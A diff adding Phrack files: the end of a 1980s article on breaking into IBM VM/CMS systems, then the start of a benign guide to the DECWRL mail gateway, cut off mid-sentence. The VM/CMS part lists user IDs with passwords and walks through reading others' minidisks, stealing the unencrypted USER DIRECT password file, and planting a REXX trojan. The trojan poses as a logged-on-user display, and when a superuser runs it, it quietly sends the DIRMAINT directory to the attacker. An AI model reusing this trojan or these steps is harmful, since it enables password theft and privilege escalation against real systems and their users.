+ LINK MAINT 300 300 RR
+ MDISK 191 3380 059 001 VMSRES MR RVMUTIL  WVMUTIL  MVMUTIL            03131808
+*
+USER IPFSERV IPFSERV 2M 16M G 64 ON ON ON ON
+*
+* 5664318 VM/IPF
+*
+ IPL CMS
+ CONSOLE 009 3215 T MAINT
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH  A
+ SPOOL 00E 1403 A
+ LINK MAINT 123 123 MW
+ LINK MAINT 190 190 RR
+ LINK MAINT 191 192 RR
+ LINK MAINT 193 193 RR
+ LINK MAINT 194 194 RR
+ LINK MAINT 19D 19D RR
+ LINK MAINT 19E 19E RR
+ LINK MAINT 294 294 RR
+ LINK MAINT 295 295 RR
+ LINK MAINT 300 300 RR
+ MDISK 191 3380 060 001 VMSRES MR RIPFSERV WIPFSERV MIPFSERV           03131808
+*
+USER ISPVM ISPVM 1M 10M EG 64 ON ON ON ON
+*
+* 5664282 ISPF
+*
+INCLUDE EXPPROF
+ ACCOUNT 104 USER04
+ MDISK 191 3380 548 005 VMSRES MR RISPVM   WISPVM   MISPVM             03131808
+ MDISK 192 3380 110 054 VMSRES MR RISPVM   WISPVM   MISPVM             03131808
+*
+USER NETVIEW NETVIEW 5M 16M G 64 ON ON ON ON
+*
+* 5664175 NETVIEW
+*
+ ACCOUNT NETVIEW GCS
+ OPTION ECMODE
+ IUCV ANY P M 0
+ IUCV *LOGREC
+ IPL GCS PARM AUTOLOG
+ CONSOLE 01F 3215
+ SPOOL 00C 2540 READER A
+ SPOOL 00D 2540 PUNCH A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 334 191 RR
+ LINK VTAM  191 291 RR
+ LINK VTAM  29A 29A RR
+ LINK MAINT 595 595 RR
+ MDISK 198 3380 166 034 VMGCS1 WR RNETVIEW WNETVIEW MNETVIEW           03131808
+*
+USER PRODBM PRODBM 1M 4M G 64 ON ON ON ON
+*
+* 5664309 PROFS DATABASE MANAGER
+*
+INCLUDE EXPPROF
+ ACCOUNT 250 PRODBM
+ OPTION MAXCONN 2000
+ IUCV ALLOW
+ LINK SYSADMIN 399 399 RR
+ MDISK 161 3380 169 011 PROFPK MR RDBM     WDBM     MDBM               03131808
+ MDISK 191 3380 165 004 PROFPK MR RDBM     WDBM     MDBM               03131808
+ MDISK 5FD 3380 206 013 PROFPK MR RDBM     WDBM     MDBM               03131808
+ MDISK 5FE 3380 193 013 PROFPK MR RDBM     WDBM     MDBM               03131808
+ MDISK 5FF 3380 180 013 PROFPK MR RDBM     WDBM     MDBM               03131808
+*
+USER PROMAIL PROMAIL 1M 2M G 64 ON ON ON ON
+*
+* 5664309 PROFS DISTRIBUTION MANAGER
+*
+INCLUDE EXPPROF
+ ACCOUNT 250 PROMAIL
+ LINK PRODBM   191 395 RR
+ LINK SYSADMIN 399 399 RR
+ MDISK 151 3380 092 004 PROFPK MR RMAIL    WMAIL    MMAIL              03131808
+ MDISK 191 3380 084 008 PROFPK MR RMAIL    WMAIL    MMAIL              03131808
+*
+USER PROCAL PROCAL 1M 4M G 64 ON ON ON ON
+*
+* 5664309 PROFS CALENDAR MANAGER
+*
+INCLUDE EXPPROF
+ ACCOUNT 250 PROCAL
+ LINK PRODBM   191 395 RR
+ LINK SYSADMIN 398 398 RR
+ LINK SYSADMIN 399 399 RR
+ MDISK 191 3380 096 004 PROFPK MR RCAL     WCAL     MCAL               03131808
+ MDISK 5FB 3380 100 013 PROFPK MR RCAL     WCAL     MCAL               03131808
+ MDISK 5FC 3380 113 013 PROFPK MR RCAL     WCAL     MCAL               03131808
+ MDISK 5FD 3380 126 013 PROFPK MR RCAL     WCAL     MCAL               03131808
+ MDISK 5FE 3380 139 013 PROFPK MR RCAL     WCAL     MCAL               03131808
+ MDISK 5FF 3380 152 013 PROFPK MR RCAL     WCAL     MCAL               03131808
+*
+USER SYSADMIN NOLOG 1M 16M EG 64 ON ON ON ON
+*
+* 5664309 PROFS ADMINISTRATOR
+*
+INCLUDE EXPPROF
+ ACCOUNT 250 SYSADMIN
+ LINK PRODBM   161 161 RR
+ LINK PRODBM   191 4FA RR
+ LINK PRODBM   5FD 5FD RR
+ LINK PRODBM   5FE 5FE RR
+ LINK PRODBM   5FF 5FF RR
+ MDISK 191 3380 001 011 PROFPK MR RADMIN   WADMIN   MADMIN             03131808
+ MDISK 298 3380 012 029 PROFPK MR RADMIN   WADMIN   MADMIN             03131808
+ MDISK 398 3380 041 019 PROFPK MR RADMIN   WADMIN   MADMIN             03131808
+ MDISK 399 3380 060 024 PROFPK MR RADMIN   WADMIN   MADMIN             03131808
+ MDISK 397 3380 219 002 PROFPK MR ALL      WADMIN   MADMIN             03131808
+*
+USER SFCM1 SFCM1 3M 5M BDG 64 ON ON ON ON
+*
+* 5664198 PSF
+*
+INCLUDE EXPPROF
+ ACCOUNT 100 PSF
+ OPTION ACCT
+ IUCV *SPL
+ LINK PDM470 191 193 RR
+ LINK PDMREM1 191 194 RR
+ LINK PSFMAINT 191 291 RR
+ LINK PSFMAINT 193 293 RR
+ LINK PSFMAINT 194 294 RR
+ MDISK 191 3380 839 020 VMSRES MR RSFCM1   WSFCM1                      03131808
+*
+USER PSFMAINT PSFMAINT 3M 16M ABCDEFG 64 ON ON ON ON
+*
+* 5664198 PSF MAINTENANCE
+*
+INCLUDE EXPPROF
+ ACCOUNT 1 SYSPROG
+ MDISK 191 3380 814 011 VMSRES MR RPSFMAIN WPSFMAIN                    03131808
+ MDISK 193 3380 825 004 VMSRES MR RPSFMAIN WPSFMAIN                    03131808
+ MDISK 194 3380 829 010 VMSRES MR RPSFMAIN WPSFMAIN                    03131808
+*
+USER PDM470 PDM470 4M 5M BG 64 ON ON ON ON
+*
+* 5664198 PSF 3800 PDM
+*
+INCLUDE EXPPROF
+ ACCOUNT 100 PSF
+ OPTION ACCT
+ IUCV *SPL
+*DEDICATE 470 470
+ LINK SFCM1 191 193 RR
+ LINK PSFMAINT 191 291 RR
+ LINK PSFMAINT 194 294 RR
+ MDISK 191 3380 809 005 VMSRES MR RPDM470  WPDM470                     03131808
+*
+USER PDMREM1 PDMREM1 4M 5M BG 64 ON ON ON ON
+*
+* 5664198 PSF 3820 PDM
+*
+ ACCOUNT 100 PSF
+ OPTION ACCT ECMODE
+ IPL GCS PARM AUTOLOG
+ IUCV *SPL
+ CONSOLE 009 3215
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 19E 19E RR
+ LINK MAINT 595 595 RR
+ LINK SFCM1 191 193 RR
+ LINK PSFMAINT 191 291 RR
+ LINK PSFMAINT 194 294 RR
+ MDISK 191 3380 804 005 VMSRES MR RPDMREM1 WPDMREM1                    03131808
+*
+USER PVM PVM 1024K 2M BG 50 ON ON ON ON
+*
+* 5748RC1 VM PASS-THROUGH FACILITY
+*
+INCLUDE EXPPROF
+ OPTION ECMODE
+ LINK MAINT 193 193 RR
+ LINK MAINT 36E 191 MR
+*
+USER RSCS RSCS 1M 2M BG 64 ON ON ON ON
+*
+* 5748XP1 RSCS V1
+*
+ ACCOUNT 15 SYSTEM
+ OPTION ACCT ECMODE
+ IPL 191
+ CONSOLE 009 3215
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 193 193 RR
+ LINK MAINT 19E 19E RR
+ LINK MAINT 19D 19D RR
+ LINK MAINT 49E 49E RR
+ MDISK 191 3380 105 002 VMSRES MR RRSCS    WRSCS    MRSCS              03131808
+*
+USER RSCSV2 RSCSV2 2M 4M BG 64 ON ON ON ON
+*
+* 5664188 RSCS (VERSION 2)
+*
+ ACCOUNT 15 SYSTEM
+ OPTION ECMODE ACCT BMX VCUNOSHR
+ IPL GCS PARM AUTOLOG
+ CONSOLE 01F 3215 T OPERATOR
+ SPOOL 00C 2540 READER A
+ SPOOL 00D 2540 PUNCH A
+ SPOOL 00E 1403 A
+ LINK MAINT 595 595 RR
+ LINK MAINT 59F 191 RR
+*
+USER SMART SMART 2048K 2M CEG 64 ON ON ON ON
+*
+* 5796PNA VM REAL TIME MONITOR SYSTEM
+*
+INCLUDE EXPPROF
+ ACCOUNT 999
+ LINK MAINT 319 319 RR
+ MDISK 191 3380 848 026 VMPK01 MR RSMART   WSMART   MSMART             03131808
+*
+USER SQLDBA SQLDBA 6M 6M G 64 ON OFF OFF \
+*
+* 5748XXJ SQL/DS ADMINISTRATOR
+*
+ ACCOUNT 26
+ OPTION MAXCONN 25
+ IUCV ALLOW
+ IUCV *IDENT SQLDBA GLOBAL
+ IPL CMS
+ CONSOLE 009 3215 T OPERATOR
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH A
+ SPOOL 00E 1403
+ LINK MAINT 190 190 RR
+ LINK MAINT 19D 19D RR
+ MDISK 191 3380 001 010 SQLPK  W                                       03131808
+ MDISK 193 3380 011 035 SQLPK  R  RSQL     WSQL                        03131808
+ MDISK 195 3380 046 013 SQLPK  RR RSQL     WSQL     MSQL               03131808
+ MDISK 200 3380 059 034 SQLPK  R  RSQL     WSQL                        03131808
+ MDISK 201 3380 093 011 SQLPK  R  RSQL     WSQL                        03131808
+ MDISK 202 3380 104 100 SQLPK  R  RSQL     WSQL                        03131808
+*
+USER SQLUSER SQLUSER 2M 2M G 64 ON ON ON ON
+*
+* 5748XXJ SQL/DS USER MACHINE
+*
+INCLUDE EXPPROF
+ ACCOUNT 27
+ OPTION REALTIMER
+ IUCV SQLDBA
+ LINK SQLDBA 195 195 RR
+ MDISK 191 3380 204 003 SQLPK  W                                       03131808
+*
+USER VMARCH VMARCH 2M 4M BEG 64 ON ON ON ON
+*
+* 5664291 VMBACKUP
+*
+INCLUDE EXPPROF
+ ACCOUNT 999
+ OPTION ACCT ECMODE
+ LINK MAINT 123 1A0 RR
+ MDISK 191 3380 001 011 VMPK02 MR RVMARCH  WVMARCH  MVMARCH            03131808
+ MDISK 193 3380 012 007 VMPK02 MR RVMARCH  WVMARCH  MVMARCH            03131808
+ MDISK 100 3380 019 007 VMPK02 MR RVMARCH  WVMARCH  MVMARCH            03131808
+ MDISK 101 3380 026 007 VMPK02 MR RVMARCH  WVMARCH  MVMARCH            03131808
+ MDISK 200 3380 033 007 VMPK02 MR RVMARCH  WVMARCH  MVMARCH            03131808
+*
+USER VMBACKUP VMBACKUP 2M 16M BEG 64 ON ON ON ON
+*
+* 5664291 VMBACKUP
+*
+ ACCOUNT 999
+ OPTION ACCT BMX ECMODE
+ IPL CMS
+ CONSOLE 009 3215
+ SPOOL 001 2540 READER *
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH
+ SPOOL 0D0 2540 PUNCH
+ SPOOL 0D1 2540 PUNCH
+ SPOOL 00E 1403
+ SPOOL 0E0 1403
+ SPOOL 0E1 1403
+ SPOOL 0E2 1403
+ SPOOL 0E3 1403
+ SPOOL 0E4 1403
+ SPOOL 0E5 1403
+ SPOOL 0E6 1403
+ SPOOL 0E7 1403
+ LINK MAINT 190 190 RR
+ LINK MAINT 19E 19E RR
+ LINK MAINT 123 1A0 RR
+ MDISK 191 3380 040 006 VMPK02 MR RVMBACKU WVMBACKU MVMBACKU           03131808
+ MDISK 192 3380 046 003 VMPK02 MR RVMBACKU WVMBACKU MVMBACKU           03131808
+ MDISK 193 3380 049 003 VMPK02 MR RVMBACKU WVMBACKU MVMBACKU           03131808
+ MDISK 194 3380 052 044 VMPK02 MR RVMBACKU WVMBACKU MVMBACKU           03131808
+*
+USER VMBSYSAD VMBSYSAD 1M 4M BG 64 ON ON ON ON
+*
+* 5664291 VMBACKUP
+*
+INCLUDE EXPPROF
+ ACCOUNT 999
+ LINK MAINT 191 124 RR
+ LINK VMBACKUP 194 294 RR RVMBACKU
+ LINK VMBACKUP 193 293 RR RVMBACKU
+ LINK MAINT 123 1A0 RR
+ MDISK 191 3380 096 005 VMPK02 MR RVMBSYSA WVMBSYSA MVMBSYSA           03131808
+ MDISK 192 3380 101 009 VMPK02 MR RVMBSYSA WVMBSYSA MVMBSYSA           03131808
+*
+USER DEMO1 DEMO1 4M 4M G 64 ON ON ON ON
+*
+* 5664283 VM/IS-PRODUCTIVITY FACILITY SAMPLE USER
+*
+INCLUDE EXPPROF
+ ACCOUNT DEMO1 DEMO1
+ IUCV SQLDBA
+ LINK MAINT    319 319 RR
+ LINK MAINT    31A 31A RR
+ LINK MAINT    322 322 RR
+ LINK MAINT    326 326 RR
+ LINK MAINT    34A 59A RR
+ LINK SQLDBA   195 195 RR
+ LINK SYSADMIN 399 399 RR
+ MDISK 191 3380 107 003 VMSRES MR RDEMO1   WDEMO1   MDEMO1             03131808
+*
+USER DEMO2 DEMO2 4M 4M G 64 ON ON ON ON
+*
+* 5664283 VM/IS-PRODUCTIVITY FACILITY SAMPLE USER
+*
+INCLUDE EXPPROF
+ ACCOUNT DEMO2 DEMO2
+ IUCV SQLDBA
+ LINK MAINT    319 319 RR
+ LINK MAINT    31A 31A RR
+ LINK MAINT    322 322 RR
+ LINK MAINT    326 326 RR
+ LINK MAINT    34A 59A RR
+ LINK SQLDBA   195 195 RR
+ LINK SYSADMIN 399 399 RR
+ MDISK 191 3380 859 003 VMSRES MR RDEMO2   WDEMO2   MDEMO2             03131808
+*
+USER DEMO3 DEMO3 4M 4M G 64 ON ON ON ON
+*
+* 5664283 VM/IS-PRODUCTIVITY FACILITY SAMPLE USER
+*
+INCLUDE EXPPROF
+ ACCOUNT DEMO3 DEMO3
+ IUCV SQLDBA
+ LINK MAINT    319 319 RR
+ LINK MAINT    31A 31A RR
+ LINK MAINT    322 322 RR
+ LINK MAINT    326 326 RR
+ LINK MAINT    34A 59A RR
+ LINK SQLDBA   195 195 RR
+ LINK SYSADMIN 399 399 RR
+ MDISK 191 3380 862 003 VMSRES MR RDEMO3   WDEMO3   MDEMO3             03131808
+*
+USER DEMO4 DEMO4 4M 4M G 64 ON ON ON ON
+*
+* 5664283 VM/IS-PRODUCTIVITY FACILITY SAMPLE USER
+*
+INCLUDE EXPPROF
+ ACCOUNT DEMO4 DEMO4
+ IUCV SQLDBA
+ LINK MAINT    319 319 RR
+ LINK MAINT    31A 31A RR
+ LINK MAINT    322 322 RR
+ LINK MAINT    326 326 RR
+ LINK MAINT    34A 59A RR
+ LINK SQLDBA   195 195 RR
+ LINK SYSADMIN 399 399 RR
+ MDISK 191 3380 865 003 VMSRES MR RDEMO4   WDEMO4   MDEMO4             03131808
+*
+USER VMTAPE VMTAPE 1M 2M BCEG 64 ON ON ON ON
+*
+* 5664292 VMTAPE
+*
+INCLUDE EXPPROF
+ ACCOUNT 999
+ OPTION BMX ECMODE ACCT
+ MDISK 191 3380 110 005 VMPK02 MR RVMTAPE  WVMTAPE  MVMTAPE            03131808
+ MDISK 200 3380 115 007 VMPK02 MR RVMTAPE  WVMTAPE  MVMTAPE            03131808
+ MDISK 300 3380 122 007 VMPK02 MR RVMTAPE  WVMTAPE  MVMTAPE            03131808
+*
+USER VMTLIBR VMTLIBR 1M 3M G 64 ON ON ON ON
+*
+* 5664292 VMTAPE
+*
+INCLUDE EXPPROF
+ ACCOUNT 999
+ LINK VMTAPE 191 193 MR
+ LINK VMTAPE 200 200 MW
+ LINK VMTAPE 300 300 MW
+ MDISK 191 3380 129 005 VMPK02 MR RVMTLIBR WVMTLIBR MVMTLIBR           03131808
+ MDISK 192 3380 134 007 VMPK02 MR RVMTLIBR WVMTLIBR MVMTLIBR           03131808
+*
+USER VMMAP VMMAP 2M 4M G 64 ON ON ON ON
+*
+* 5664191 VMMAP
+*
+INCLUDE EXPPROF
+ ACCOUNT 999
+ LINK MAINT 193 193 RR
+ MDISK 191 3380 639 024 VMSRES MR RVMMAP   WVMMAP   MVMMAP             03131808
+*
+USER VTAM VTAM 5M 16M G 64 ON ON ON ON
+*
+* 5664280 VTAM
+*
+ ACCOUNT VTAM GCS
+ OPTION ECMODE DIAG98 MAXCONN 400
+ IUCV *CCS P M 10
+ IUCV ANY P M 0
+ IPL GCS PARM AUTOLOG
+ CONSOLE 01F 3215
+ SPOOL 00C 2540 READER A
+ SPOOL 00D 2540 PUNCH A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 298 191 RR
+ LINK MAINT 29A 29A RR
+ LINK MAINT 595 595 RR
+*
+USER VM3812 VM3812 3M 4M BG 64 ON ON ON ON
+*
+* 5798DTE VM3812 SERVICE MACHINE
+*
+INCLUDE EXPPROF
+ ACCOUNT 15 SYSTEM
+ MDISK 191 3380 813 004 VMPK01 MR RVM3812  WVM3812  MVM3812            03131808
+ MDISK 192 3380 817 007 VMPK01 MR RVM3812  WVM3812  MVM3812            03131808
+ MDISK 193 3380 824 020 VMPK01 MR ALL      WVM3812                     03131808
+*    ADD USER ID ------
+USER VSEMAN VSE 2M 16M ABCDEFG 42 ON ON ON ON
+INCLUDE EXPPROF
+ ACCOUNT 999 SYSTEM
+ MDISK 191 3380 001 030 EDMD01 MR VSE                                  03131808
+ MDISK 192 3380 873 012 VMSRES MR VSE                                  03131808
+USER PENG PENG  2M 16M ABCDEFG 42 ON ON ON ON
+INCLUDE EXPPROF
+ ACCOUNT 999 SYSTEM
+ MDISK 191 3380 553 010 VMSRES MR PENG PENG                            03131808
+*
+USER MOESERV MOESERV  2M 16M G 42 ON ON ON ON
+INCLUDE EXPPROF
+ ACCOUNT 996 MOE
+ MDISK 191 3380 544 002 VMPK01 MR MOESERV MOESERV                      03131808
+*
+USER VTAMUSER CCC      2M 8M G 64 ON ON ON ON
+*
+* 5668814 CSP
+*
+ INCLUDE EXPPROF
+ ACCOUNT 101
+ MDISK 191 3380 134 032 VMPK01 MW VTAM1  WVTAM1   MVTAM1               03131808
+USER IDMSSE IDMS     2M 8M G 64 ON ON ON ON
+ INCLUDE EXPPROF
+ ACCOUNT 101
+ MDISK 191 3380 519 005 VMPK01 MW VTAM1  WVTAM1   MVTAM1               03131808
+ MDISK 192 3380 524 020 VMPK01 MW VTAM1  WVTAM1   MVTAM1               03131808
+
+===============================================================================
+
+If you need an explanation about these two tables, you should look at it like
+this:
+
+       |------User ID
+       |     |-------That User ID's password
+       ^     ^
+USER IDMSSE IDMS     2M 8M G 64 ON ON ON ON
+                     ^  ^  ^
+                     |  |  |---Its privilege grade
+                     |  |--Its maximum memory storage
+                     |
+                     |----Its default memory storage
+
+ INCLUDE EXPPROF  <-----What you see when you log on
+ ACCOUNT 101
+ MDISK 191 3380 519 005 VMPK01 MW VTAM1  WVTAM1   MVTAM1
+        ^                          ^       ^      ^
+        |                          |       |      |---Minidisk mult pass
+        |                          |       |---Minidisk write pass
+        |                          |---Minidisk read pass
+        |--Its minidisk
+
+ MDISK 192 3380 524 020 VMPK01 MW VTAM1  WVTAM1   MVTAM1
+
+===============================================================================
+
+Luckily, I have tested the second table in 4 VM systems and it works.  May you
+be lucky too!
+
+Of course, since all of us are general users, the first thing to know is how to
+get privileges by trying a password or by accident by getting privileged users'
+passwords.
+
+While CP/CMS uses passwords to control performance, it must store some
+passwords in the REXX command language (EXEC files).  It looks like this:
+
+CP LINK VTAMUSER 191 121 RR VTAM1
+
+If you have succeeded in linking that minidisk then:
+
+AC 121 B
+FILEL * * B
+
+Then you can see all of the files owned by VTAMUSER.  Usually people are lazy
+enough to remember too many passwords, so to read the passwords.  It may be its
+CP pass too!  TRY IT!!!
+
+But IBM is not so stupid as to let any user with privileges open accounts
+randomly.  It limits a maximum of 8 superusers to be able to do it.  You may
+find it in:
+
+DIRMAINT DATA Y2
+
+Only these DIRM-STAFF can open accounts from the console.  If another user logs
+on from a terminal, he will be logged out immediately even though he knew the
+password. And only these STAFF have 2 modes of operation to use:
+
+DIRM
+
+One is general user mode and the other is operation mode (Privilege operation)
+so you have to cheat the O.S. to think that you are NOT logged in from a
+terminal.  Our way is to use TELNET.  Usually this package is named TCPIP.  Do
+this:
+
+TELNET yourhost
+
+It will request you logon again.  Then, if you logon with the superuser ID &
+password, the O.S. will not recognize that you are from a terminal and will let
+you in!!  The most important thing is that IBM stores its user IDs & passwords
+in a file:
+
+USER DIRECT
+
+Usually, this file is stored on DIRMAINT's minidisk and it is a text file!!!  I
+do not know why, but it actually is not encrypted!!!!  Incredible to believe...
+
+Once you have this file, you will know all users' passwords and all information
+about all users' IDs and I think it is rude to open new accounts!  Poor me!
+I've done this and lost privs 3 times now.  While there is a way to get back
+your privs, first you need find a privileged ID so that you can write your file
+in it.  Then, write a EXEC file into it.  This file's name must be a most
+common command that any one will issue.  If the general user uses it, nothing
+happens, but if a superuser issues it, then it will do something for you!  Here
+is a example:
+
+Please note that wherever you see (cut), it means that the line was too long
+and had to be split.  Whenever you see (cut), take the line below the line that
+it is on and paste it on the end of the (cut) line (removing the (cut) in the
+process).
+
+-----------------------------------Cut Here------------------------------------
+/* DISPLAY THE NUMBER OF SPECIFIED USERS LOGGED ON */
+TRACE O
+USER  = 0
+SW    = 1
+S     = 1
+PARSE UPPER ARG NAM GARBAGE
+IF NAM = ' ' THEN signal qname
+PO = INDEX(NAM,'*')
+IF PO = 0 THEN DO
+   Q NAM
+   EXIT
+  END
+T = PO - 1
+IF T= 0 THEN signal qname
+NALL = SUBSTR(NAM,1,T)
+EXECIO '* CP (STRING Q N '
+NUMQ  = QUEUED()
+DO N  = 1 TO NUMQ
+   PULL STR
+PARSE VALUE STR with  NA.N '-' LA.N ',' NB.N '-' LB.N ',' NC.N '-' LC.N (cut)
+    ','ND.N '-' LD.N
+na.n=substr(strip(na.n,'L'),1,8)
+nb.n=substr(strip(nb.n,'L'),1,8)
+nc.n=substr(strip(nc.n,'L'),1,8)
+nd.n=substr(strip(nd.n,'L'),1,8)
+END
+DO N  = 1 TO NUMQ
+   IF LA.N ^= DSC & LA.N ^= ' ' & SUBSTR(NA.N,1,T)=NALL & (cut)
+         SUBSTR(space(NA.N),1,4)^='LOGO' & SPACE
+      A.S = NA.N||'-'||LA.N||',' ; S=S+1 ; USER=USER+1; END;
+   IF LB.N ^= DSC & LB.N ^= ' ' & SUBSTR(NB.N,1,T)=NALL & (cut)
+         SUBSTR(space(NB.N),1,4)^='LOGO' & SPACE
+      A.S = NB.N||'-'||LB.N||',' ; S=S+1 ; USER=USER+1; END;
+   IF LC.N ^= DSC & LC.N ^= ' ' & SUBSTR(NC.N,1,T)=NALL & (cut)
+         SUBSTR(space(NC.N),1,4)^='LOGO' & SPACE
+      A.S = NC.N||'-'||LC.N||',' ; S=S+1 ; USER=USER+1; END;
+   IF LD.N ^= DSC & LD.N ^= ' ' & SUBSTR(ND.N,1,T)=NALL & (cut)
+         SUBSTR(space(ND.N),1,4)^='LOGO' SPACE(L
+      A.S = ND.N||'-'||LD.N||',' ; S=S+1 ; USER=USER+1; END;
+END
+CLRSCRN
+call concate
+SAY
+MM= ' <- - - - - - - - - - - -' RIGHT(USER,3,0) ' SPECIFIED LOGON USERS - (cut)
+         - - - - - - - - - - ->'
+say MM
+SAY
+SAY
+EXIT
+QNAME:
+/* DISPLAY THE NUMBER OF USERS LOGGED ON */
+USER  = 0
+SW    = 1
+S     = 1
+EXECIO '* CP (STRING Q N '
+IF USERID() ='MAINT' THEN SIGNAL NJ  /*super user id */
+IF USERID() ='JASMIN' THEN SIGNAL NJ /*super user id */
+IF USERID() ='LIU' THEN SIGNAL NJ    /*supr userid */
+IF USERID() ='PMAINT' THEN SIGNAL NJ /*super user id*/
+IF USERID() ='MOESERV' THEN SIGNAL NJ /* super user id*/
+SIGNAL JP
+NJ:
+CP SET IMSG OFF
+CP SET MSG OFF
+EXEC DIRMAINT GET DIRMAINT NOLOCK
+SLEEP 2  SEC
+CP TRAN     USERID() ALL yourid   /* to your own id*/
+CP SET IMSG ON
+CP SET MSG ON
+JP:
+NUMQ  = QUEUED()
+DO N  = 1 TO NUMQ
+   PULL STR
+         PARSE VALUE STR with  NA.N '-' LA.N ',' NB.N '-' LB.N ',' NC.N (cut)
+         '-' LC.N ','ND.N '-' LD.N
+na.n=substr(strip(na.n,'L'),1,8)
+nb.n=substr(strip(nb.n,'L'),1,8)
+nc.n=substr(strip(nc.n,'L'),1,8)
+nd.n=substr(strip(nd.n,'L'),1,8)
+END
+DO N  = 1 TO NUMQ
+   IF LA.N ='VTAM' THEN SELECT
+      WHEN (S+0)//4 = 1 THEN DO
+      LA.N ='VTAM' THEN DO
+      A.S ='VSM - VTAM'       ; S = S+1 ;
+      A.S=' ' ; S=S+1 ; A.S=' ' ; S=S+1 ; A.S =' ' ; S=S+1 ; ITERATE
+   END
+      WHEN (S+0)//4 = 2 THEN DO
+      A.S = ' ' ; S = S+1 ; A.S = ' '   ;S=S+1 ; A.S =' ' ; S=S+1 ;END
+      WHEN (S+0)//4 = 3 THEN DO;A.S =' ';S=S+1 ; A.S =' ' ; S=S+1 ;END;
+      WHEN (S+0)//4 = 0 THEN DO; A.S = ' ' ; S=S+1 ; END
+   END
+   IF LA.N ='VTAM' THEN DO
+      A.S ='VSM - VTAM'       ; S = S+1 ;
+      A.S=' ' ; S=S+1 ; A.S=' ' ; S=S+1 ; A.S =' ' ; S=S+1 ; ITERATE
+   END
+   IF LA.N ^= DSC & LA.N ^= ' ' & SUBSTR(space(NA.N),1,4)^='LOGO' & (cut)
+         SPACE(LA.N)^=SPACE(NA.N) THEN
+      A.S = NA.N||'-'||LA.N||',' ; S=S+1 ; USER=USER+1; END;
+   IF LB.N ^= DSC & LB.N ^= ' ' & SUBSTR(space(NB.N),1,4)^='LOGO' & (cut)
+         SPACE(LB.N)^=SPACE(NB.N) THEN
+      A.S = NB.N||'-'||LB.N||',' ; S=S+1 ; USER=USER+1; END;
+   IF LC.N ^= DSC & LC.N ^= ' ' & SUBSTR(space(NC.N),1,4)^='LOGO' & (cut)
+         SPACE(LC.N)^=SPACE(NC.N) THEN
+      A.S = NC.N||'-'||LC.N||',' ; S=S+1 ; USER=USER+1; END;
+   IF LD.N ^= DSC & LD.N ^= ' ' & SUBSTR(space(ND.N),1,4)^='LOGO' & (cut)
+SPACE(LD.N)^=SPACE(ND.N) THEN
+      A.S = ND.N||'-'||LD.N||',' ; S=S+1 ; USER=USER+1; END;
+END
+CLRSCRN
+call concate
+SAY
+MM= ' <- - - - - - - - - - - - - ' RIGHT(USER,3,0) ' LOGON  USERS - - - - (cut)
+         - - - - - - - - - - ->'
+say  MM
+SAY
+exit
+concate:
+DO I = 1 TO S-1 BY 4
+   IF I+1 < S   THEN   P=I+1   ;      ELSE A.P = ' '
+   IF I+2 < S   THEN   Q=I+2   ;      ELSE A.Q = ' '
+   IF I+3 < S   THEN   R=I+3   ;      ELSE A.R = ' '
+   STR= ' '
+   IF I+3 < S   THEN   R=I+3   ;      ELSE A.R = ' '
+   STR=INSERT(A.I,STR,1)       ;      STR=INSERT(A.P,STR,21)
+   STR=INSERT(A.Q,STR,41)      ;      STR=INSERT(A.R,STR,61)
+   SAY STR
+END
+return
+-----------------------------------Cut Here------------------------------------
+
+Well, that is it...Unfortunately, we did not know how to install a backdoor in
+IBM VM/CMS so we could not keep privs permanently.  It is a pity...but we're
+glad to share our experience with hackers!
+
+                               Sincerely,
+
+                                            Goe
+_______________________________________________________________________________
diff --git a/phrack30/5.txt b/phrack30/5.txt
new file mode 100644
index 0000000..25ec290
--- /dev/null
+++ b/phrack30/5.txt
@@ -0,0 +1,457 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 30, File #5 of 12
+
+                    ()()()()()()()()()()()()()()()()()()()
+                    ()                                  ()
+                    ()      The DECWRL Mail Gateway     ()
+                    ()                                  ()
+                    ()         by Dedicated Link        ()
+                    ()                                  ()
+                    ()        September 20, 1989        ()
+                    ()                                  ()
+                    ()()()()()()()()()()()()()()()()()()()
+
+
+INTRODUCTION
+
+DECWRL is a mail gateway computer operated by Digital's Western Research
+Laboratory in Palo Alto, California.  Its purpose is to support the interchange
+of electronic mail between Digital and the "outside world."
+
+DECWRL is connected to Digital's Easynet, and also to a number of different
+outside electronic mail networks.  Digital users can send outside mail by
+sending to DECWRL::"outside-address", and digital users can also receive mail
+by having your correspondents route it through DECWRL.  The details of incoming
+mail are more complex, and are discussed below.
+
+It is vitally important that Digital employees be good citizens of the networks
+to which we are connected.  They depend on the integrity of our user community
+to ensure that tighter controls over the use of the gateway are not required.
+The most important rule is "no chain letters," but there are other rules
+depending on whether the connected network that you are using is commercial or
+non-commercial.
+
+The current traffic volume (September 1989) is about 10,000 mail messages per
+day and about 3,000 USENET messages per day.  Gatewayed mail traffic has
+doubled every year since 1983.  DECWRL is currently a Vax 8530 computer with 48
+megabytes of main memory, 2500 megabytes of disk space, 8 9600-baud (Telebit)
+modem ports, and various network connections.  They will shortly be upgrading
+to a Vax 8650 system.  They run Ultrix 3.0 as the base operating system.
+
+
+ADMINISTRATION
+
+The gateway has engineering staff, but no administrative or clerical staff.
+They work hard to keep it running, but they do not have the resources to answer
+telephone queries or provide tutorials in its use.
+
+They post periodic status reports to the USENET newsgroup dec.general.  Various
+helpful people usually copy these reports to the VAXNOTES "gateways" conference
+within a day or two.
+
+
+HOW TO SEND MAIL
+
+DECWRL is connected to quite a number of different mail networks.  If you were
+logged on directly to it, you could type addresses directly, e.g.
+
+    To: strange!foreign!address.
+
+But since you are not logged on directly to the gateway, you must send mail so
+that when it arrives at the gateway, it will be sent as if that address had
+been typed locally.
+
+
+* Sending from VMS
+
+If you are a VMS user, you should use NMAIL, because VMS mail does not know how
+to requeue and retry mail when the network is congested or disconnected.  From
+VMS, address your mail like this:
+
+    To: nm%DECWRL::"strange!foreign!address"
+
+The quote characters (") are important, to make sure that VMS doesn't try to
